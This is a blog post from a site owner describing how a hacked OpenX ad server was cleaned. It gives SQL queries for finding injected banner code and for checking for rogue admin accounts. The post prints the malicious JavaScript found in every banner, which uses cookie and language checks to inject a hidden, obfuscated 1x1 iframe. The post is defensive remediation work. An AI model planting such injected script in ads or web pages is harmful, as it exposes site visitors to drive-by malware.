Openx Server hacked and infected with malicious shit

May 2nd, 2011 | By | Category: Internet

So I received a notice from google alerting me that one of my websites was infected with malicious code.. At first I thought it was a mistake on their part because of the sneaky way I serve my ads but when the second notice came in for another domain I looked a little closer into the issue and found that I had in fact been compromised.  Well openx in particular had been compromised 🙁  So the fun task began of cleaning out this shit from my advertising server so that all of my sites wouldn’t be messed up and below are the instructions for what I did:

Part of these instructions I found here and a big thanks go out to the author for putting them up.

The first thing to do was to check for any malicious banners being inserted into my banners via the append or prepend fields.  Just got into mysql and type this:

SELECT bannerid, append, prepend FROM ox_banners WHERE append != ” OR prepend != ”;


Resulted in this:

<script language=”javascript”>
var dc=document; var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+86400000);if(dc.cookie.indexOf(‘Z=a2’) <= 0 && dc.cookie.indexOf(‘Z=a0’) > 0){
function clng(wrd){var cou=new Array(‘en-us’,’en-ca’,’en-au’,’en-gb’,’fr-ca’,’fr’,’de’,’es’,’it’,’ru’,’ru-ru’);for(i=0;i<cou.length;i++){if(wrd==cou[i])return true;}return false;}
if(typeof navigator.language == ‘undefined’){var nav = navigator.userLanguage} else {var nav = navigator.language;}
if(typeof run == ‘undefined’&&clng(nav.toLowerCase())){dc.writeln(“<script type=\”text/javascript\”><!–“);dc.writeln(“var host=’ widt’+’h=1 h’+’eight’+’=1 ‘; var src=’src=’; var brdr=’fra’+’mebor’+’der=’+’0′;var sc=’ ‘;”);dc.writeln(“document.write(‘<ifr’+’ame’+host+src+sc+brdr+’></ifra’+’me>’);”);dc.writeln(“//–><\/script>”);
dc.cookie=’sZ=a2; path=/; expires=’+date_ob.toGMTString();}} dc.cookie=’zZ=a0; path=/;’;var run=1;

being repeated a bunch of times, one for every banner in fact.  So it looked like I was infact infected and it was time to clean this garbage out. The next step was to go into phpmyadmin and edit each banner entry, removing this malicious code entirely.

After this I checked tomak sure that there were no extra admin accounts created, which there weren’t luckily enough by typing this into mysql:

SELECT u.user_id, u.contact_name, u.email_address, u.username FROM ox_users AS u, ox_account_user_assoc AS aua WHERE u.user_id=aua.user_id AND aua.account_id = (SELECT value FROM ox_application_variable WHERE name=’admin_account_id’);


Finally as a precaution for some of the other threads I found I searched through for all instances of the word IFRAME as it has been used in this hack and everything came up clean.

At this point I am fairly confident the bad shit has been cleaned out so the last step is to completely upgrade openx as per the instructions here:

I think that shuold do it, so time to go into google webmaster tools and request a scan of the site to confirm everything has been cleaned out


Tags: , , , ,

Leave a Comment